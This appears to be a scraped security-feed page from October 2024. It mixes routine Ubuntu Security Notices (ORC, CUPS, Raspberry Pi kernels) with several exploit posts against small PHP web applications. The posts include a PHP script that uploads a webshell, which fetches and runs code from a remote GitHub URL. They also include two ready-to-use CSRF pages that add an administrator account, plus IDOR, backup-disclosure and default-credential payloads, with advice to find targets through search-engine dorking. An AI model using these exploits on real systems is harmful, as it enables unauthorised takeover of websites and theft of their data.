Ubuntu Security Notice 6964-2 - USN-6964-1 fixed a vulnerability in ORC. This update provides the corresponding updates for Ubuntu 16.04 LTS and Ubuntu 18.04 LTS. Noriko Totsuka discovered that ORC incorrectly handled certain specially crafted files. An attacker could possibly use this issue to execute arbitrary code.

==========================================================================  
Ubuntu Security Notice USN-6964-2  
October 01, 2024

orc vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 18.04 LTS  
- Ubuntu 16.04 LTS

Summary:

ORC could be made to crash or execute arbitrary code

Software Description:  
- orc: Library of Optimized Inner Loops Runtime Compiler

Details:

USN-6964-1 fixed a vulnerability in ORC. This update provides the  
corresponding updates for Ubuntu 16.04 LTS and Ubuntu 18.04 LTS.

Original advisory details:

 Noriko Totsuka discovered that ORC incorrectly handled certain  
 specially crafted files. An attacker could possibly use this issue  
 to execute arbitrary code.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 18.04 LTS  
  liborc-0.4-0                    1:0.4.28-1ubuntu0.1~esm1  
                                  Available with Ubuntu Pro  
  liborc-0.4-dev                  1:0.4.28-1ubuntu0.1~esm1  
                                  Available with Ubuntu Pro

Ubuntu 16.04 LTS  
  liborc-0.4-0                    1:0.4.25-1ubuntu0.1~esm1  
                                  Available with Ubuntu Pro  
  liborc-0.4-dev                  1:0.4.25-1ubuntu0.1~esm1  
                                  Available with Ubuntu Pro

In general, a standard system update will make all the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-6964-2  
  https://ubuntu.com/security/notices/USN-6964-1  
  CVE-2024-40897

Ubuntu Security Notice USN-6964-2

Task Management System version 1.0 suffers from a PHP code injection vulnerability.

    =============================================================================================================================================| # Title     : Task Management System 1.0 php code injection Vulnerability                                                                 || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                            || # Vendor    : https://www.campcodes.com/downloads/task-management-system-in-php-mysql-source-code/?wpdmdl=8164&refresh=66bb949d45e891723569309 |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] This PHP code is designed to create a file and inject PHP code.[+] save payload as poc.php [+] usage : C:\www\test>php poc.php 127.0.0.1[+] payload : <?phpfunction file_upload($target_ip) {    $file_name = "indoushka.php";    $webshell_payload = "<?php        \$url = 'https://raw.githubusercontent.com/indoushka/txt/main/indoushka.txt';        \$ch = curl_init();        curl_setopt(\$ch, CURLOPT_URL, \$url);        curl_setopt(\$ch, CURLOPT_RETURNTRANSFER, true);        \$output = curl_exec(\$ch);        curl_close(\$ch);        if (\$output) {            include 'data://text/plain;base64,' . base64_encode(\$output);        }    ?>";    $post_fields = array(                'save' => '',        'firstname' => 'az',        'lastname' => 'azgt',        'email' => 'az@gt.gt',        'password' => 'az@gtgt',      'img' => new CURLFile('data://text/plain;base64,' . base64_encode($webshell_payload), 'application/x-php', $file_name),                  'qty' => '1'    );    $ch = curl_init();    curl_setopt($ch, CURLOPT_URL, "$target_ip/ajax.php?action=update_user");    curl_setopt($ch, CURLOPT_POST, 1);    curl_setopt($ch, CURLOPT_POSTFIELDS, $post_fields);    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);    $response = curl_exec($ch);    curl_close($ch);    echo "(+) Shell uploaded successfully.\n";    echo "(+) Access the shell at: $target_ip/assets/uploads/\n";}if ($argc != 2) {    echo "(+) Usage: php " . $argv[0] . " <target ip>\n";    echo "(+) Example: php " . $argv[0] . " 10.0.0.1\n";    exit(-1);}$target_ip = $argv[1];file_upload($target_ip);Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Task Management System 1.0 Code Injection

Ubuntu Security Notice 7022-2 - Several security issues were discovered in the Linux kernel. An attacker could possibly use these to compromise the system.

    ==========================================================================Ubuntu Security Notice USN-7022-2October 01, 2024linux-raspi vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 20.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux-raspi: Linux kernel for Raspberry Pi systemsDetails:Several security issues were discovered in the Linux kernel.An attacker could possibly use these to compromise the system.This update corrects flaws in the following subsystems:  - GPU drivers;  - Modular ISDN driver;  - MMC subsystem;  - SCSI drivers;  - F2FS file system;  - GFS2 file system;  - Netfilter;  - RxRPC session sockets;  - Integrity Measurement Architecture(IMA) framework;(CVE-2021-47188, CVE-2024-42160, CVE-2024-42228, CVE-2022-48863,CVE-2024-26677, CVE-2024-26787, CVE-2024-38570, CVE-2024-39494,CVE-2022-48791, CVE-2024-27012)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 20.04 LTS  linux-image-5.4.0-1117-raspi    5.4.0-1117.129  linux-image-raspi               5.4.0.1117.147  linux-image-raspi2              5.4.0.1117.147After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:  https://ubuntu.com/security/notices/USN-7022-2  https://ubuntu.com/security/notices/USN-7022-1  CVE-2021-47188, CVE-2022-48791, CVE-2022-48863, CVE-2024-26677,  CVE-2024-26787, CVE-2024-27012, CVE-2024-38570, CVE-2024-39494,  CVE-2024-42160, CVE-2024-42228Package Information:  https://launchpad.net/ubuntu/+source/linux-raspi/5.4.0-1117.129

Ubuntu Security Notice USN-7022-2

Supply Chain Management version 1.0 suffers from a backup disclosure vulnerability.

    =============================================================================================================================================| # Title     : Supply Chain Management v1.0 Backup Disclosure Vulnerability                                                                || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://download-media.code-projects.org/2020/04/Supply_Chain_Management_IN_PHP_CSS_Js_AND_MYSQL__FREE_DOWNLOAD.zip         |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /backup/[+] Panel : http://127.0.0.1/scm-master/backup/Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Supply Chain Management 1.0 Backup Disclosure

Event Management System version 1.0 suffers from an insecure direct object reference vulnerability.

    =============================================================================================================================================| # Title     : Event Management System v1.0 IDOR Vulnerability                                                                             || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                            || # Vendor    : https://www.kashipara.com/project/download/project2/user/2023/202302/kashipara.com_event-mgt-sys-zip.zip                    |=============================================================================================================================================POC :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Direct Object Reference : suffers from an insecure direct object reference that allows users to access the administrative interface.[+] Use Payload : /admin/gallary.php[+] http://127.0.0.1/event_mgt_sys/admin/gallary.phpGreetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Event Management System 1.0 Insecure Direct Object Reference

Ubuntu Security Notice 7041-2 - USN-7041-1 fixed a vulnerability in CUPS. This update provides the corresponding update for Ubuntu 18.04 LTS. Simone Margaritelli discovered that CUPS incorrectly sanitized IPP data when creating PPD files. A remote attacker could possibly use this issue to manipulate PPD files and execute arbitrary code when a printer is used.

==========================================================================  
Ubuntu Security Notice USN-7041-2  
October 01, 2024

cups vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 18.04 LTS

Summary:

CUPS could be made to crash or run programs if it received specially  
crafted network traffic.

Software Description:  
- cups: Common UNIX Printing System(tm)

Details:

USN-7041-1 fixed a vulnerability in CUPS. This update provides  
the corresponding update for Ubuntu 18.04 LTS.

Original advisory details:

 Simone Margaritelli discovered that CUPS incorrectly sanitized IPP  
 data when creating PPD files. A remote attacker could possibly use this  
 issue to manipulate PPD files and execute arbitrary code when a printer is  
 used.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 18.04 LTS  
  cups                            2.2.7-1ubuntu2.10+esm6  
                                  Available with Ubuntu Pro

In general, a standard system update will make all the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-7041-2  
  https://ubuntu.com/security/notices/USN-7041-1  
  CVE-2024-47175

Ubuntu Security Notice USN-7041-2

Ubuntu Security Notice 7003-5 - It was discovered that the JFS file system contained an out-of-bounds read vulnerability when printing xattr debug information. A local attacker could use this to cause a denial of service. Several security issues were discovered in the Linux kernel. An attacker could possibly use these to compromise the system.

    ==========================================================================Ubuntu Security Notice USN-7003-5October 01, 2024linux-raspi-5.4 vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 18.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux-raspi-5.4: Linux kernel for Raspberry Pi systemsDetails:It was discovered that the JFS file system contained an out-of-bounds readvulnerability when printing xattr debug information. A local attacker coulduse this to cause a denial of service (system crash). (CVE-2024-40902)Several security issues were discovered in the Linux kernel.An attacker could possibly use these to compromise the system.This update corrects flaws in the following subsystems:  - MIPS architecture;  - PowerPC architecture;  - x86 architecture;  - ACPI drivers;  - Serial ATA and Parallel ATA drivers;  - Drivers core;  - GPIO subsystem;  - GPU drivers;  - Greybus drivers;  - HID subsystem;  - I2C subsystem;  - IIO subsystem;  - InfiniBand drivers;  - Media drivers;  - VMware VMCI Driver;  - Network drivers;  - Pin controllers subsystem;  - S/390 drivers;  - SCSI drivers;  - USB subsystem;  - JFFS2 file system;  - JFS file system;  - File systems infrastructure;  - NILFS2 file system;  - IOMMU subsystem;  - Sun RPC protocol;  - Netfilter;  - Memory management;  - B.A.T.M.A.N. meshing protocol;  - CAN network layer;  - Ceph Core library;  - Networking core;  - IPv4 networking;  - IPv6 networking;  - IUCV driver;  - MAC80211 subsystem;  - NET/ROM layer;  - Network traffic control;  - SoC Audio for Freescale CPUs drivers;(CVE-2024-40916, CVE-2024-41035, CVE-2024-39469, CVE-2024-39499,CVE-2024-36978, CVE-2024-42092, CVE-2024-42087, CVE-2024-42102,CVE-2024-40978, CVE-2024-40902, CVE-2024-36974, CVE-2024-42096,CVE-2024-40974, CVE-2024-40904, CVE-2024-40905, CVE-2024-42153,CVE-2024-42106, CVE-2024-42070, CVE-2024-41097, CVE-2024-42090,CVE-2024-42105, CVE-2024-42104, CVE-2024-39502, CVE-2024-41089,CVE-2024-40945, CVE-2024-38619, CVE-2024-40961, CVE-2024-42127,CVE-2024-39487, CVE-2024-40988, CVE-2024-41044, CVE-2024-42236,CVE-2024-40942, CVE-2024-39506, CVE-2024-39509, CVE-2024-39503,CVE-2024-40934, CVE-2024-40959, CVE-2024-42101, CVE-2024-40960,CVE-2024-40968, CVE-2024-41087, CVE-2023-52803, CVE-2024-40987,CVE-2024-40943, CVE-2024-42089, CVE-2023-52887, CVE-2024-37078,CVE-2024-42148, CVE-2024-36894, CVE-2024-42097, CVE-2024-41006,CVE-2024-40984, CVE-2024-40963, CVE-2024-42223, CVE-2024-40912,CVE-2024-42086, CVE-2024-41049, CVE-2024-42157, CVE-2024-41034,CVE-2024-42145, CVE-2024-42124, CVE-2024-40995, CVE-2024-42224,CVE-2024-40981, CVE-2024-41095, CVE-2024-40901, CVE-2024-42115,CVE-2024-41041, CVE-2024-41007, CVE-2024-39505, CVE-2024-40932,CVE-2024-39495, CVE-2024-40980, CVE-2024-42084, CVE-2024-41046,CVE-2024-42119, CVE-2024-42076, CVE-2024-42232, CVE-2024-39501,CVE-2024-40958, CVE-2024-40941, CVE-2024-42093, CVE-2024-42094,CVE-2024-42154)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 18.04 LTS  linux-image-5.4.0-1116-raspi    5.4.0-1116.128~18.04.1          Available with Ubuntu Pro  linux-image-raspi-hwe-18.04     5.4.0.1116.128~18.04.1          Available with Ubuntu ProAfter a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:  https://ubuntu.com/security/notices/USN-7003-5  https://ubuntu.com/security/notices/USN-7003-4  https://ubuntu.com/security/notices/USN-7003-3  https://ubuntu.com/security/notices/USN-7003-2  https://ubuntu.com/security/notices/USN-7003-1  CVE-2023-52803, CVE-2023-52887, CVE-2024-36894, CVE-2024-36974,  CVE-2024-36978, CVE-2024-37078, CVE-2024-38619, CVE-2024-39469,  CVE-2024-39487, CVE-2024-39495, CVE-2024-39499, CVE-2024-39501,  CVE-2024-39502, CVE-2024-39503, CVE-2024-39505, CVE-2024-39506,  CVE-2024-39509, CVE-2024-40901, CVE-2024-40902, CVE-2024-40904,  CVE-2024-40905, CVE-2024-40912, CVE-2024-40916, CVE-2024-40932,  CVE-2024-40934, CVE-2024-40941, CVE-2024-40942, CVE-2024-40943,  CVE-2024-40945, CVE-2024-40958, CVE-2024-40959, CVE-2024-40960,  CVE-2024-40961, CVE-2024-40963, CVE-2024-40968, CVE-2024-40974,  CVE-2024-40978, CVE-2024-40980, CVE-2024-40981, CVE-2024-40984,  CVE-2024-40987, CVE-2024-40988, CVE-2024-40995, CVE-2024-41006,  CVE-2024-41007, CVE-2024-41034, CVE-2024-41035, CVE-2024-41041,  CVE-2024-41044, CVE-2024-41046, CVE-2024-41049, CVE-2024-41087,  CVE-2024-41089, CVE-2024-41095, CVE-2024-41097, CVE-2024-42070,  CVE-2024-42076, CVE-2024-42084, CVE-2024-42086, CVE-2024-42087,  CVE-2024-42089, CVE-2024-42090, CVE-2024-42092, CVE-2024-42093,  CVE-2024-42094, CVE-2024-42096, CVE-2024-42097, CVE-2024-42101,  CVE-2024-42102, CVE-2024-42104, CVE-2024-42105, CVE-2024-42106,  CVE-2024-42115, CVE-2024-42119, CVE-2024-42124, CVE-2024-42127,  CVE-2024-42145, CVE-2024-42148, CVE-2024-42153, CVE-2024-42154,  CVE-2024-42157, CVE-2024-42223, CVE-2024-42224, CVE-2024-42232,  CVE-2024-42236

Ubuntu Security Notice USN-7003-5

Student Attendance Management System version 1.0 suffers from an ignored default credential vulnerability.

    =============================================================================================================================================| # Title     : Student Attendance Management System v1.0 Insecure Settings Vulnerability                                                   || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/php/14561/student-attendance-management-system-using-phpmysqli-source-code.html              |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload : user =  admin & pass = admin123[+] https://www/127.0.0.1/yorubanwitness000webhostappcom/admin/Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Student Attendance Management System 1.0 Insecure Settings

Printing Business Records Management System version 1.0 suffers from a cross site request forgery vulnerability.

    =============================================================================================================================================| # Title     : Printing Business Records Management System v1.0 CSRF Add ADmin Vulnerability                                               || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                            || # Vendor    : https://www.kashipara.com/project/download/project2/user/2023/202301/kashipara.com_pbrms-0-zip.zip                          |=============================================================================================================================================POC :[+] Dorking İn Google Or Other Search Enggine.[+] The following html code add new admin .[+] Line 06 set your target.[+] Line 15 + 19 set your user & pass[+] save code as poc.html .<!DOCTYPE html> <html> <body> <script> function submitRequest()  { var xhr = new XMLHttpRequest();  xhr.open("POST", "http://localhost/pbrms/classes/Users.php?f=save", true); xhr.setRequestHeader("Accept", "*\/*");  xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5"); xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------"); xhr.withCredentials = true;  var body = "-----------------------------\r\n" +  "Content-Disposition: form-data; name=\"username\"\r\n" +  "\r\n" +  "indoushka\r\n" +  "-----------------------------\r\n" +  "Content-Disposition: form-data; name=\"password\"\r\n" +  "\r\n" +  "Hacked\r\n" +  "-----------------------------\r\n" +  "Content-Disposition: form-data; name=\"type\"\r\n" +  "\r\n" +  "1\r\n" +  "-------------------------------\r\n";  var aBody = new Uint8Array(body.length);  for (var i = 0; i < aBody.length; i++)  aBody[i] = body.charCodeAt(i);  xhr.send(new Blob([aBody]));  } </script> <form action="#"> <input type="button" value="Submit request" onclick="submitRequest();" /> </form>  </body>  </html>Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Printing Business Records Management System 1.0 Cross Site Request Forgery

Online Eyewear Shop version 1.0 suffers from a cross site request forgery vulnerability.

    =============================================================================================================================================| # Title     : Online Eyewear Shop v1.0 CSRF Add ADmin Vulnerability                                                                       || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                            || # Vendor    : https://www.kashipara.com/project/download/project2/user/2023/202301/kashipara.com_php-oews-zip.zip                          |=============================================================================================================================================POC :[+] Dorking İn Google Or Other Search Enggine.[+] The following html code add new admin .[+] Line 06 set your target.[+] Line 15 + 19 set your user & pass[+] save code as poc.html .<!DOCTYPE html> <html> <body> <script> function submitRequest()  { var xhr = new XMLHttpRequest();  xhr.open("POST", "http://localhost/oews/admin/classes/Users.php?f=save", true); xhr.setRequestHeader("Accept", "*\/*");  xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5"); xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------"); xhr.withCredentials = true;  var body = "-----------------------------\r\n" +  "Content-Disposition: form-data; name=\"username\"\r\n" +  "\r\n" +  "indoushka\r\n" +  "-----------------------------\r\n" +  "Content-Disposition: form-data; name=\"password\"\r\n" +  "\r\n" +  "Hacked\r\n" +  "-----------------------------\r\n" +  "Content-Disposition: form-data; name=\"type\"\r\n" +  "\r\n" +  "1\r\n" +  "-------------------------------\r\n";  var aBody = new Uint8Array(body.length);  for (var i = 0; i < aBody.length; i++)  aBody[i] = body.charCodeAt(i);  xhr.send(new Blob([aBody]));  } </script> <form action="#"> <input type="button" value="Submit request" onclick="submitRequest();" /> </form>  </body>  </html>Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Latest News